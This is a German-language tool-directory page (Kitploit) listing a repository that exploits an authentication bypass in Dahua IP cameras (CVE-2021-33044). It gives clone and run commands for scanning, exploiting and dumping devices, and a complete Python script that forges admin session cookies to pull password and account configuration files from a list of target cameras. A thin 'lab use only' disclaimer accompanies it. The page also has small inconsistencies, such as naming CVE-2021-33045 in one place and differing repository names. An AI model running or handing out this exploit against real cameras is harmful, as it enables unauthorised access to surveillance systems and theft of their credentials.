Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — # DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Tools/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Authentifizierung & AutorisierungIoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

# DAHUA_AUTH-BYPASS-CVE-2021-33044

Repository anzeigen
9vor 2 MonatenNoch nicht geprüft

Exploit-Simulation für den Dahua Authentication Bypass PoC (CVE-2021-33044)

Übersicht

Dahua-IP-Kameras sind IoT-Geräte, die häufig in Sicherheitsüberwachungssystemen eingesetzt werden. Da sie oft in internen Netzwerken bereitgestellt oder über das Internet erreicht werden, können Sicherheitslücken in IP-Kameras schwerwiegende Auswirkungen auf die Privatsphäre und die Informationssicherheit haben.

CVE-2021-33045 ist eine Sicherheitslücke, die in einigen Dahua-Kameramodellen besteht und unbefugten Zugriff auf interne Konfigurationsressourcen ohne gültige Authentifizierung ermöglicht. Diese Schwachstelle resultiert aus einer unzureichenden Zugriffskontrollmechanik in der Firmware des Geräts.

Schwachstelleninformationen

FeldInhalt
CVECVE-2021-33044
TypAuthentication Bypass
SchweregradCritical (CVSS ~9.8)
AuthKeine Authentifizierung erforderlich
BetroffenDahua-Kamera / DVR / NVR

Ursache

Die Schwachstelle resultiert aus einem unsicheren Authentifizierungsdesign in der Firmware der Dahua-Kameras:

  • Der Server prüft Session/Token nicht korrekt
  • Vertraut auf Daten, die vom Client gesendet werden
  • Einige sensible Konfigurations-Endpoints prüfen nur die Existenz des Cookies, nicht die tatsächliche Zugriffsberechtigung

Dies ermöglicht einem Angreifer:

  • den Authentifizierungsprozess zu fälschen
  • den Login vollständig zu umgehen

Referenzen:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Funktionsweise des Authentifizierungs-Bypass-Mechanismus

Normaler Ablauf

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Szenario

Verwendung

Installation

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Netzwerkscan

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Übliche Dahua-Ports: 80,443, 8080, 37777, 37778

Ausnutzen der CVE-Schwachstelle

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Authentifizierung umgehen

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Beispiel

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Erklärung

  • Das Skript verwendet die Bibliothek requests und deaktiviert aktiv SSL-Warnungen, um SSL-Warnungen zu deaktivieren.

  • Die Funktion dump_accounts(ip, port=80) ist die Hauptfunktion, die für die Prüfung einer Kamera zuständig ist. Die Hauptfunktion dient dazu:

    • die URL aus IP-Adresse und Port zu erstellen
    • den Administrator-Login-Status über Cookies zu simulieren
    • Anfragen an sensible Konfigurations-Endpoints zu senden
    • die Antworten auszuwerten, um festzustellen, ob das Gerät betroffen ist
  • Simulierte Authentifizierungs-Cookies. Die Funktion verwendet Cookie-Werte wie:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Bei betroffenen Kameraversionen überprüft das Backend die tatsächliche sessionID nicht, sodass das System annimmt, die Anfrage stamme von einem gültigen Administratorkonto.

Verarbeitungsschleife für die Zielliste

Das Skript liest die Zielliste aus einer Eingabedatei und ruft nacheinander die Prüffunktion für jedes Gerät auf. Dieser Ansatz ermöglicht die automatische Bewertung mehrerer Kameras.

image

Entwicklungsprozess

Diese Skripte wurden auf Grundlage folgender Quellen entwickelt:

  • Veröffentlichte CVE-Details von NVD
  • Sicherheitshinweise von Dahua
  • Öffentliche PoC-Referenzen (seclists.org, packetstormsecurity)

Teststatus:

  • Die Authentifizierungs-Bypass-Logik wurde gemäß den CVE-Spezifikationen umgesetzt
  • Begrenzte Tests auf verwundbaren Geräten.

Hinweis

Dieses Projekt:

  • Dient ausschließlich zu Lern- und Forschungszwecken
  • Bitte nur in einer persönlichen Laborumgebung ausführen
Tool herunterladen
Datei
Zweck
CVEs
dahua_scanner.pyNetzwerkerkundung – findet Dahua-Kameras im SubnetzErkennung
dahua_exploit.pyMulti-CVE-Scan-Tool – prüft alle Sicherheitslücken.Alle
dahua_auth_bypass.pySpezialisierter Authentifizierungs-Bypass mit der Option --dumpCVE-2021-33044